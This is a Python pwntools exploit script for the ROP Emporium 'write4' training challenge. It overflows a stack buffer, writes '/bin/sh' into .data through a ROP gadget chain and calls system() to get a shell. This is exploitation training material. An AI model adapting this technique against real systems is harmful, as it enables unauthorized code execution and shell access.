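#!/usr/bin/env python3
"""ROP Emporium "write4" (amd64, non-PIE) exploit.

Overflow the stack buffer, use a write-what-where gadget to drop the
NUL-terminated string "/bin/sh" into the writable .data section, then
call system() with that address in rdi.

All addresses below are hard-coded from the disassembly / section
listing of the specific ./write4 build they were taken from; they are
only valid for that binary (no PIE, no ASLR of the main image).

Usage:  ./exploit.py          run under pwntools
        ./exploit.py GDB      run under gdb, breaking at main
"""
from pwn import *

# Gadgets (from the original disassembly):
#   0x00400820  4d893e  mov qword [r14], r15 ; ret   <- 8-byte write-what-where
#   0x00400890  415e    pop r14
#   0x00400892  415f    pop r15
#   0x00400894  c3      ret
#   0x00400893  5f      pop rdi ; ret   (the lone 0x5f byte inside "41 5f pop r15",
#                                        i.e. an unaligned gadget in the same sequence)
POP_RDI_RET = 0x00400893
MOV_R14_R15_RET = 0x00400820
POP_R14_POP_R15_RET = 0x00400890

# 0x4005e0 is presumably the system@plt stub (confirm with elf.plt["system"]).
SYSTEM = 0x4005E0

# [25] .data  PROGBITS  0x601050  size 0x10  flags WA  -> writable, 16 bytes,
# enough for one 8-byte write of "/bin/sh\0".
DATA_SECTION = 0x601050

# Distance from the start of the overflowed buffer to the saved return
# address.  Taken from the original exploit (40 = buffer + saved rbp is the
# usual layout) -- re-measure with cyclic()/cyclic_find() if the binary changes.
RET_OFFSET = 40

BIN_SH = b"/bin/sh\x00"


def build_payload(command=BIN_SH, offset=RET_OFFSET):
    """Return the bytes to send: filler + ROP chain.

    Chain:  pop r14 (= .data) ; pop r15 (= command bytes) ; ret
            mov [r14], r15 ; ret          -> command lands in .data
            pop rdi (= .data) ; ret
            system

    Args:
        command: the string to write; it travels in the r15 slot, so it
            must fit in one 8-byte qword and be NUL-terminated inside it.
            Shorter values are NUL-padded.
        offset:  bytes of filler before the saved return address.

    Raises:
        ValueError: if command is longer than 8 bytes (would need a second
            write) or has no NUL terminator within the written qword.
    """
    if len(command) > 8:
        raise ValueError("command must fit in one qword (8 bytes incl. NUL)")
    qword = command.ljust(8, b"\x00")
    if b"\x00" not in qword:
        raise ValueError("command must be NUL-terminated within 8 bytes")

    chain = (
        p64(POP_R14_POP_R15_RET) + p64(DATA_SECTION) + qword
        + p64(MOV_R14_R15_RET)
        + p64(POP_RDI_RET) + p64(DATA_SECTION)
        # If system() faults on a movaps (rsp not 16-byte aligned at the
        # call), insert an extra ret gadget, e.g. p64(0x400894), here.
        + p64(SYSTEM)
    )
    # bytes throughout: p64() returns bytes on Python 3, and mixing it with
    # str filler raises TypeError.
    return b"A" * offset + chain


def main():
    """Spawn ./write4 (optionally under gdb) and deliver the payload."""
    # context.binary sets arch/os/bits from the ELF itself.
    context.binary = elf = ELF("./write4")
    if elf.pie:
        raise SystemExit("hard-coded gadget addresses require a non-PIE binary")

    if args.GDB:
        p = gdb.debug(elf.path, "break main")
    else:
        p = process(elf.path)

    p.sendline(build_payload())
    p.interactive()


if __name__ == "__main__":
    main()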